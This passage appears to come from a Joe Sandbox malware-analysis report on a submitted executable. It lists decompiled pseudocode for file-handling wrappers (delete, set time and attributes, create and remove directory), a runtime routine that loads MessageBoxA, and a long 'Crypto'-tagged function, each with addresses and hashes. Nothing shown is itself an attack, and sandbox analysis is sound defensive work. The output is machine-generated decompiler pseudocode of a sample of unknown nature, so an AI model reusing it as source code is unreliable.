                                          • FindCloseChangeNotification.KERNELBASE(00000000,?,00405A2C,?,00000000,00000003,?,00000000,?,00000000), ref: 00405A6E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: ChangeCloseFindNotification
                                          • String ID:
                                          • API String ID: 2591292051-0
                                          • Opcode ID: 762bf37c8decbf6063af4facc99c374a5abed3ea2b8a5978318a093aad6de801
                                          • Instruction ID: 8a38a6d9813b312501c47e0c29c9a2f8cf12ac5fa7676fc4773f80372e0f1af5
                                          • Opcode Fuzzy Hash: 762bf37c8decbf6063af4facc99c374a5abed3ea2b8a5978318a093aad6de801
                                          • Instruction Fuzzy Hash: 5CD0C93160462146CA645E3C7C849D737D89A16330325176AF0B5D22E4D3748D875E94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00404BDC Relevance: 1.5, APIs: 1, Instructions: 14fileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00404BDC(CHAR* __ecx, void* __eflags) {
				void* _t3;
				signed int _t4;

				_t3 = E0040489C(__ecx, 0);
				if(_t3 != 0) {
					_t4 = DeleteFileA(__ecx); // executed
					return _t4 & 0xffffff00 | _t4 != 0x00000000;
				} else {
					return _t3;
				}
			}





                                          0x00404be1
                                          0x00404be8
                                          0x00404bed
                                          0x00404bf9
                                          0x00404beb
                                          0x00404beb
                                          0x00404beb

                                          APIs
                                            • Part of subcall function 0040489C: SetFileAttributesA.KERNELBASE(?,00000000,00404D1C,?,00000000,0000002A,0000005C,00000003,?,00000000), ref: 0040489E
                                          • DeleteFileA.KERNELBASE(?,?,00404DBF,?,00000000,?,?,?,?,?,00000000), ref: 00404BED
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: File$AttributesDelete
                                          • String ID:
                                          • API String ID: 2910425767-0
                                          • Opcode ID: aaa2e24e3cadb2417611b806b2e2b1e55713074da21130e803bc74bd8fb11f06
                                          • Instruction ID: 9a45e8f854b003a178289988cc7fc064ae5902da4cc88310474d582750e90668
                                          • Opcode Fuzzy Hash: aaa2e24e3cadb2417611b806b2e2b1e55713074da21130e803bc74bd8fb11f06
                                          • Instruction Fuzzy Hash: 0BC08C26209231439A043ABA3805ACB171E0EC122030AC0BBB800A2059CB288DC221DC
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00405C5A Relevance: 1.5, APIs: 1, Instructions: 9timeCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E00405C5A(void** __ecx, FILETIME* _a4, FILETIME* _a8, FILETIME* _a12) {
				signed int _t4;

				_t4 = SetFileTime( *__ecx, _a4, _a8, _a12); // executed
				asm("sbb eax, eax");
				return  ~( ~_t4);
			}




                                          0x00405c68
                                          0x00405c70
                                          0x00405c74

                                          APIs
                                          • SetFileTime.KERNELBASE(?,?,?,?,00405C84,00000000,00000000,?,00402E12,?), ref: 00405C68
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: FileTime
                                          • String ID:
                                          • API String ID: 1425588814-0
                                          • Opcode ID: c611d48c496a84d7274e6d5b9c1e90c61bae575044892d23a6eff34163934cc8
                                          • Instruction ID: 87fe90df0bd66b56430cb58ce5188ab21e49bedd0782b4bf3c7b48ca6ef22eff
                                          • Opcode Fuzzy Hash: c611d48c496a84d7274e6d5b9c1e90c61bae575044892d23a6eff34163934cc8
                                          • Instruction Fuzzy Hash: 8EC04C36158105FF8F020F70CC04C5EBFA2EB99711F10C918B269C40B0C7328024EB02
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040489C Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0040489C(CHAR* __ecx, long __edx) {
				signed int _t3;

				_t3 = SetFileAttributesA(__ecx, __edx); // executed
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}




                                          0x0040489e
                                          0x004048a9

                                          APIs
                                          • SetFileAttributesA.KERNELBASE(?,00000000,00404D1C,?,00000000,0000002A,0000005C,00000003,?,00000000), ref: 0040489E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          • Opcode ID: 9ef3a3077910c683e57a22045a29601e29b9581d2df390f15cf492c25b36c35e
                                          • Instruction ID: c0231da6564a4fbd22ddd4f059f5cfeb57e5ba4ab4dd36146b68eeddd1056acd
                                          • Opcode Fuzzy Hash: 9ef3a3077910c683e57a22045a29601e29b9581d2df390f15cf492c25b36c35e
                                          • Instruction Fuzzy Hash: 5BA002A03112059BA6145B315E0AB6F296DEDC9AE1705C56C7412C5060EB29C9505565
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040498D Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0040498D(CHAR* __ecx) {
				signed int _t3;

				_t3 = CreateDirectoryA(__ecx, 0); // executed
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}




                                          0x00404990
                                          0x0040499b

                                          APIs
                                          • CreateDirectoryA.KERNELBASE(?,00000000,00405228,?,?,?,?,00000003,?,00000000,?,00000000), ref: 00404990
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: CreateDirectory
                                          • String ID:
                                          • API String ID: 4241100979-0
                                          • Opcode ID: b19b64997772cde21bab08b79878e27a599263e6d5f620d435ec54b846f4109b
                                          • Instruction ID: 18df801fa9cda183c38834b8287032c54ef98b8f5de1dc60049a64e9909c76fe
                                          • Opcode Fuzzy Hash: b19b64997772cde21bab08b79878e27a599263e6d5f620d435ec54b846f4109b
                                          • Instruction Fuzzy Hash: DCA0223030030283E2200F320E0AB0F280CAF08AC0F00C02C3000C80E0FB28C000008C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004048AA Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E004048AA(CHAR* __ecx) {
				signed int _t3;

				_t3 = RemoveDirectoryA(__ecx); // executed
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}




                                          0x004048ab
                                          0x004048b6

                                          APIs
                                          • RemoveDirectoryA.KERNELBASE(?,00404D27,?,00000000,0000002A,0000005C,00000003,?,00000000), ref: 004048AB
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: DirectoryRemove
                                          • String ID:
                                          • API String ID: 597925465-0
                                          • Opcode ID: 5eb19e86367385bc71ec08970d66f6ec81c8b6c1d5f16cf833c81eadf1f07443
                                          • Instruction ID: 8a2519b774f471bade5b05e48f192836a719b77eeaa2736f11b150acbb720719
                                          • Opcode Fuzzy Hash: 5eb19e86367385bc71ec08970d66f6ec81c8b6c1d5f16cf833c81eadf1f07443
                                          • Instruction Fuzzy Hash: E7A002603112058796241B315F0968F295D9D455D1706C5696516C4060DB29C5505555
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Function 00418320 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 50libraryloaderCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          C-Code - Quality: 46%
                                          			E00418320(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr* _t4;
				intOrPtr* _t7;
				_Unknown_base(*)()* _t11;
				void* _t14;
				struct HINSTANCE__* _t15;
				void* _t17;

				_t14 = 0;
				_t17 =  *0x423514 - _t14; // 0x0
				if(_t17 != 0) {
					L4:
					_t4 =  *0x423518; // 0x0
					if(_t4 != 0) {
						_t14 =  *_t4();
						if(_t14 != 0) {
							_t7 =  *0x42351c; // 0x0
							if(_t7 != 0) {
								_t14 =  *_t7(_t14);
							}
						}
					}
					return  *0x423514(_t14, _a4, _a8, _a12);
				}
				_t15 = LoadLibraryA("user32.dll");
				if(_t15 == 0) {
					L10:
					return 0;
				}
				_t11 = GetProcAddress(_t15, "MessageBoxA");
				 *0x423514 = _t11;
				if(_t11 == 0) {
					goto L10;
				} else {
					 *0x423518 = GetProcAddress(_t15, "GetActiveWindow");
					 *0x42351c = GetProcAddress(_t15, "GetLastActivePopup");
					goto L4;
				}
			}









                                          0x00418321
                                          0x00418323
                                          0x0041832b
                                          0x0041836f
                                          0x0041836f
                                          0x00418376
                                          0x0041837a
                                          0x0041837e
                                          0x00418380
                                          0x00418387
                                          0x0041838c
                                          0x0041838c
                                          0x00418387
                                          0x0041837e
                                          0x00000000
                                          0x0041839b
                                          0x00418338
                                          0x0041833c
                                          0x004183a5
                                          0x00000000
                                          0x004183a5
                                          0x0041834a
                                          0x0041834e
                                          0x00418353
                                          0x00000000
                                          0x00418355
                                          0x00418363
                                          0x0041836a
                                          0x00000000
                                          0x0041836a

                                          APIs
                                          • LoadLibraryA.KERNEL32(user32.dll,?,00000000,00000000,0041795A,?,Microsoft Visual C++ Runtime Library,00012010,?,0041BD2C,?,0041BD7C,?,?,?,Runtime Error!Program: ), ref: 00418332
                                          • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 0041834A
                                          • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 0041835B
                                          • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00418368
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: AddressProc$LibraryLoad
                                          • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                                          • API String ID: 2238633743-4044615076
                                          • Opcode ID: 3f0a24d6d85b05054a3dd2e72677b881a91c1b783ec14cf3ede4e9bf1f2578f7
                                          • Instruction ID: e87ed1bb16eb8be6f8b96595097180185a60ce52c98033cfd4ddfb8cddd90555
                                          • Opcode Fuzzy Hash: 3f0a24d6d85b05054a3dd2e72677b881a91c1b783ec14cf3ede4e9bf1f2578f7
                                          • Instruction Fuzzy Hash: C50179713002057F87209FB59C80A9B7AF4EB44B45318003EB558C3251DB6DCFC29BE9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040E5A5 Relevance: 1.7, APIs: 1, Instructions: 246COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 99%
                                          			E0040E5A5(intOrPtr __ecx, signed int __edx) {
				signed int _t133;
				intOrPtr _t135;
				signed int _t136;
				signed int _t137;
				signed int _t148;
				intOrPtr _t159;
				signed int _t160;
				intOrPtr _t162;
				void* _t164;
				signed int _t167;
				intOrPtr _t175;
				signed int _t177;
				signed int _t183;
				intOrPtr _t184;
				intOrPtr _t185;
				intOrPtr _t201;
				signed int _t211;
				signed int _t214;
				signed int _t215;
				intOrPtr _t217;
				signed int _t218;
				void* _t219;
				void* _t220;
				void* _t221;
				signed int _t223;
				signed int _t225;
				void* _t226;

				_t211 = __edx;
				E00413954(E0041A690, _t226);
				_t175 = __ecx;
				 *((intOrPtr*)(_t226 - 0x14)) = __ecx;
				E004042D6();
				_t223 =  *(_t226 + 8);
				E00404327( *((intOrPtr*)(_t226 + 0xc)),  *(_t223 + 8));
				while(1) {
					_t133 = E0040DBF4( *((intOrPtr*)(_t175 + 0x18)), _t211);
					_t183 = _t211;
					 *(_t226 - 0x1c) = _t133;
					 *(_t226 - 0x18) = _t183;
					if(_t133 != 0xd) {
						goto L6;
					}
					L2:
					_t211 = 0;
					if(_t183 != 0) {
						L7:
						__eflags = _t133 - 0xa;
						if(_t133 != 0xa) {
							L9:
							__eflags = _t133 - 9;
							if(_t133 != 9) {
								L11:
								__eflags = _t133 | _t183;
								if((_t133 | _t183) == 0) {
									L13:
									_t135 =  *((intOrPtr*)(_t226 + 0xc));
									__eflags =  *((intOrPtr*)(_t135 + 8)) - _t211;
									if( *((intOrPtr*)(_t135 + 8)) != _t211) {
										L17:
										_t184 =  *((intOrPtr*)(_t226 + 0xc));
										_t214 = 0;
										 *(_t226 - 0x10) = 0;
										__eflags =  *((intOrPtr*)(_t184 + 8)) - _t211;
										if( *((intOrPtr*)(_t184 + 8)) <= _t211) {
											L27:
											__eflags =  *(_t226 - 0x1c) - 9;
											if( *(_t226 - 0x1c) == 9) {
												__eflags =  *(_t226 - 0x18) - _t211;
												if( *(_t226 - 0x18) == _t211) {
													_t160 = E0040DBF4( *((intOrPtr*)(_t175 + 0x18)), _t211);
													_t184 =  *((intOrPtr*)(_t226 + 0xc));
													 *(_t226 - 0x18) = _t211;
													 *(_t226 - 0x1c) = _t160;
													_t211 = 0;
													__eflags = 0;
												}
											}
											_t215 =  *(_t223 + 8);
											 *(_t226 - 0x10) = _t211;
											__eflags = _t215 - _t211;
											 *(_t226 + 8) = _t211;
											if(_t215 <= _t211) {
												L37:
												_t136 =  *(_t226 - 0x1c);
												__eflags = _t136 - 0xa;
												if(_t136 != 0xa) {
													L48:
													_t137 = _t136 |  *(_t226 - 0x18);
													__eflags = _t137;
													if(_t137 == 0) {
														_t185 =  *((intOrPtr*)(_t226 + 0x14));
														__eflags =  *((intOrPtr*)(_t185 + 8)) - _t211;
														if( *((intOrPtr*)(_t185 + 8)) != _t211) {
															L54:
															 *[fs:0x0] =  *((intOrPtr*)(_t226 - 0xc));
															return _t137;
														}
														E0040D9F9(_t185,  *(_t226 + 8));
														_t137 = E004042D6();
														_t225 =  *(_t226 + 8);
														__eflags = _t225;
														if(_t225 <= 0) {
															goto L54;
														} else {
															goto L53;
														}
														do {
															L53:
															_t137 = E004039DF( *((intOrPtr*)(_t226 + 0x18)), 0);
															_t225 = _t225 - 1;
															__eflags = _t225;
														} while (_t225 != 0);
														goto L54;
													}
													E0040DBE1( *((intOrPtr*)(_t175 + 0x18)), _t211);
													L50:
													 *(_t226 - 0x1c) = E0040DBF4( *((intOrPtr*)(_t175 + 0x18)), _t211);
													 *(_t226 - 0x18) = _t211;
													goto L36;
												}
												__eflags =  *(_t226 - 0x18) - _t211;
												if(__eflags != 0) {
													goto L48;
												}
												 *(_t226 - 0x48) = _t211;
												 *(_t226 - 0x44) = _t211;
												 *(_t226 - 0x40) = _t211;
												 *((intOrPtr*)(_t226 - 0x3c)) = 1;
												 *((intOrPtr*)(_t226 - 0x4c)) = 0x41b748;
												 *(_t226 - 4) = _t211;
												 *(_t226 - 0x34) = _t211;
												 *(_t226 - 0x30) = _t211;
												 *(_t226 - 0x2c) = _t211;
												 *((intOrPtr*)(_t226 - 0x28)) = 4;
												 *((intOrPtr*)(_t226 - 0x38)) = 0x41b684;
												 *(_t226 - 4) = 1;
												E0040E23F(_t175, __eflags,  *(_t226 - 0x10), _t226 - 0x4c, _t226 - 0x38);
												_t177 = 0;
												__eflags =  *(_t223 + 8);
												 *(_t226 + 0x10) = 0;
												if( *(_t223 + 8) <= 0) {
													L47:
													 *(_t226 - 4) =  *(_t226 - 4) & 0x00000000;
													E004042AD(_t226 - 0x38);
													 *(_t226 - 4) =  *(_t226 - 4) | 0xffffffff;
													E004042AD(_t226 - 0x4c);
													_t175 =  *((intOrPtr*)(_t226 - 0x14));
													goto L50;
												} else {
													goto L40;
												}
												do {
													L40:
													_t217 =  *((intOrPtr*)( *((intOrPtr*)(_t223 + 0xc)) + _t177 * 4));
													_t148 =  *( *((intOrPtr*)( *((intOrPtr*)(_t226 + 0xc)) + 0xc)) + _t177 * 4);
													__eflags = _t148 - 1;
													if(_t148 != 1) {
														L43:
														__eflags = _t148;
														if(_t148 <= 0) {
															goto L46;
														}
														_t218 = _t148;
														do {
															E0040C413( *((intOrPtr*)(_t226 + 0x14)),  *((intOrPtr*)( *(_t226 - 0x40) +  *(_t226 + 0x10))));
															E004039DF( *((intOrPtr*)(_t226 + 0x18)),  *((intOrPtr*)( *(_t226 - 0x2c) +  *(_t226 + 0x10) * 4)));
															 *(_t226 + 0x10) =  *(_t226 + 0x10) + 1;
															_t218 = _t218 - 1;
															__eflags = _t218;
														} while (_t218 != 0);
														goto L46;
													}
													__eflags =  *((char*)(_t217 + 0x54));
													if( *((char*)(_t217 + 0x54)) == 0) {
														goto L43;
													}
													E0040C413( *((intOrPtr*)(_t226 + 0x14)), _t148);
													E004039DF( *((intOrPtr*)(_t226 + 0x18)),  *((intOrPtr*)(_t217 + 0x50)));
													L46:
													_t177 = _t177 + 1;
													__eflags = _t177 -  *(_t223 + 8);
												} while (_t177 <  *(_t223 + 8));
												goto L47;
											} else {
												 *(_t226 + 0x10) =  *(_t184 + 0xc);
												do {
													_t201 =  *((intOrPtr*)( *(_t226 + 0x10) + _t211 * 4));
													__eflags = _t201 - 1;
													if(_t201 != 1) {
														L34:
														_t64 = _t226 - 0x10;
														 *_t64 =  *(_t226 - 0x10) + _t201;
														__eflags =  *_t64;
														goto L35;
													}
													_t159 =  *((intOrPtr*)( *((intOrPtr*)(_t223 + 0xc)) + _t211 * 4));
													__eflags =  *((char*)(_t159 + 0x54));
													if( *((char*)(_t159 + 0x54)) != 0) {
														goto L35;
													}
													goto L34;
													L35:
													 *(_t226 + 8) =  *(_t226 + 8) + _t201;
													_t211 = _t211 + 1;
													__eflags = _t211 - _t215;
												} while (_t211 < _t215);
												L36:
												_t211 = 0;
												__eflags = 0;
												goto L37;
											}
										} else {
											goto L18;
										}
										do {
											L18:
											_t162 =  *((intOrPtr*)( *(_t184 + 0xc) + _t214 * 4));
											__eflags = _t162 - _t211;
											if(_t162 == _t211) {
												goto L26;
											}
											__eflags = _t162 - 1;
											 *(_t226 - 0x24) = _t211;
											 *(_t226 - 0x20) = _t211;
											if(_t162 <= 1) {
												L25:
												_t164 = E0040C281( *((intOrPtr*)( *((intOrPtr*)(_t223 + 0xc)) + _t214 * 4)));
												asm("sbb edx, [ebp-0x20]");
												E0040F953( *(_t226 + 0x10), _t164 -  *(_t226 - 0x24), _t211);
												_t184 =  *((intOrPtr*)(_t226 + 0xc));
												_t211 = 0;
												__eflags = 0;
												goto L26;
											}
											_t167 = _t162 - 1;
											__eflags = _t167;
											 *(_t226 + 8) = _t167;
											do {
												__eflags =  *(_t226 - 0x1c) - 9;
												if( *(_t226 - 0x1c) == 9) {
													__eflags =  *(_t226 - 0x18) - _t211;
													if( *(_t226 - 0x18) == _t211) {
														_t219 = E0040DBF4( *((intOrPtr*)(_t175 + 0x18)), _t211);
														E0040F953( *(_t226 + 0x10), _t219, _t211);
														 *(_t226 - 0x24) =  *(_t226 - 0x24) + _t219;
														_t214 =  *(_t226 - 0x10);
														asm("adc [ebp-0x20], ebx");
														_t175 =  *((intOrPtr*)(_t226 - 0x14));
														_t211 = 0;
														__eflags = 0;
													}
												}
												_t36 = _t226 + 8;
												 *_t36 =  *(_t226 + 8) - 1;
												__eflags =  *_t36;
											} while ( *_t36 != 0);
											goto L25;
											L26:
											_t214 = _t214 + 1;
											__eflags = _t214 -  *((intOrPtr*)(_t184 + 8));
											 *(_t226 - 0x10) = _t214;
										} while (_t214 <  *((intOrPtr*)(_t184 + 8)));
										goto L27;
									}
									_t220 = 0;
									__eflags =  *(_t223 + 8) - _t211;
									if( *(_t223 + 8) <= _t211) {
										goto L17;
									} else {
										goto L15;
									}
									do {
										L15:
										E004039DF( *((intOrPtr*)(_t226 + 0xc)), 1);
										_t220 = _t220 + 1;
										__eflags = _t220 -  *(_t223 + 8);
									} while (_t220 <  *(_t223 + 8));
									_t211 = 0;
									__eflags = 0;
									goto L17;
								}
								E0040DBE1( *((intOrPtr*)(_t175 + 0x18)), _t211);
								while(1) {
									_t133 = E0040DBF4( *((intOrPtr*)(_t175 + 0x18)), _t211);
									_t183 = _t211;
									 *(_t226 - 0x1c) = _t133;
									 *(_t226 - 0x18) = _t183;
									if(_t133 != 0xd) {
										goto L6;
									}
									goto L2;
								}
								goto L6;
							}
							__eflags = _t183 - _t211;
							if(_t183 == _t211) {
								goto L13;
							}
							goto L11;
						}
						__eflags = _t183 - _t211;
						if(_t183 == _t211) {
							goto L13;
						}
						goto L9;
					}
					_t221 = 0;
					if( *(_t223 + 8) <= 0) {
						continue;
					} else {
						goto L4;
					}
					do {
						L4:
						E004039DF( *((intOrPtr*)(_t226 + 0xc)), E0040DC90(0));
						_t221 = _t221 + 1;
					} while (_t221 <  *(_t223 + 8));
					continue;
					L6:
					_t211 = 0;
					__eflags = 0;
					goto L7;
				}
			}






























                                          0x0040e5a5
                                          0x0040e5aa
                                          0x0040e5b3
                                          0x0040e5ba
                                          0x0040e5bd
                                          0x0040e5c2
                                          0x0040e5cb
                                          0x0040e5d0
                                          0x0040e5d3
                                          0x0040e5d8
                                          0x0040e5dd
                                          0x0040e5e0
                                          0x0040e5e3
                                          0x00000000
                                          0x00000000
                                          0x0040e5e5
                                          0x0040e5e5
                                          0x0040e5e9
                                          0x0040e60d
                                          0x0040e60d
                                          0x0040e610
                                          0x0040e616
                                          0x0040e616
                                          0x0040e619
                                          0x0040e61f
                                          0x0040e61f
                                          0x0040e621
                                          0x0040e62d
                                          0x0040e62d
                                          0x0040e630
                                          0x0040e633
                                          0x0040e64e
                                          0x0040e64e
                                          0x0040e651
                                          0x0040e653
                                          0x0040e656
                                          0x0040e659
                                          0x0040e6d1
                                          0x0040e6d1
                                          0x0040e6d5
                                          0x0040e6d7
                                          0x0040e6da
                                          0x0040e6df
                                          0x0040e6e4
                                          0x0040e6e7
                                          0x0040e6ea
                                          0x0040e6ed
                                          0x0040e6ed
                                          0x0040e6ed
                                          0x0040e6da
                                          0x0040e6ef
                                          0x0040e6f2
                                          0x0040e6f5
                                          0x0040e6f7
                                          0x0040e6fa
                                          0x0040e726
                                          0x0040e726
                                          0x0040e729
                                          0x0040e72c
                                          0x0040e80e
                                          0x0040e80e
                                          0x0040e80e
                                          0x0040e811
                                          0x0040e82e
                                          0x0040e831
                                          0x0040e834
                                          0x0040e85a
                                          0x0040e860
                                          0x0040e868
                                          0x0040e868
                                          0x0040e839
                                          0x0040e841
                                          0x0040e846
                                          0x0040e849
                                          0x0040e84b
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040e84d
                                          0x0040e84d
                                          0x0040e852
                                          0x0040e857
                                          0x0040e857
                                          0x0040e857
                                          0x00000000
                                          0x0040e84d
                                          0x0040e816
                                          0x0040e81b
                                          0x0040e823
                                          0x0040e826
                                          0x00000000
                                          0x0040e826
                                          0x0040e732
                                          0x0040e735
                                          0x00000000
                                          0x00000000
                                          0x0040e73b
                                          0x0040e73e
                                          0x0040e741
                                          0x0040e744
                                          0x0040e74b
                                          0x0040e752
                                          0x0040e755
                                          0x0040e758
                                          0x0040e75b
                                          0x0040e75e
                                          0x0040e765
                                          0x0040e776
                                          0x0040e77d
                                          0x0040e782
                                          0x0040e784
                                          0x0040e787
                                          0x0040e78a
                                          0x0040e7f1
                                          0x0040e7f1
                                          0x0040e7f8
                                          0x0040e7fd
                                          0x0040e804
                                          0x0040e809
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040e78c
                                          0x0040e78c
                                          0x0040e795
                                          0x0040e798
                                          0x0040e79b
                                          0x0040e79e
                                          0x0040e7bc
                                          0x0040e7bc
                                          0x0040e7be
                                          0x00000000
                                          0x00000000
                                          0x0040e7c0
                                          0x0040e7c2
                                          0x0040e7cf
                                          0x0040e7e0
                                          0x0040e7e5
                                          0x0040e7e8
                                          0x0040e7e8
                                          0x0040e7e8
                                          0x00000000
                                          0x0040e7c2
                                          0x0040e7a0
                                          0x0040e7a4
                                          0x00000000
                                          0x00000000
                                          0x0040e7aa
                                          0x0040e7b5
                                          0x0040e7eb
                                          0x0040e7eb
                                          0x0040e7ec
                                          0x0040e7ec
                                          0x00000000
                                          0x0040e6fc
                                          0x0040e6ff
                                          0x0040e702
                                          0x0040e705
                                          0x0040e708
                                          0x0040e70b
                                          0x0040e719
                                          0x0040e719
                                          0x0040e719
                                          0x0040e719
                                          0x00000000
                                          0x0040e719
                                          0x0040e710
                                          0x0040e713
                                          0x0040e717
                                          0x00000000
                                          0x00000000
                                          0x00000000
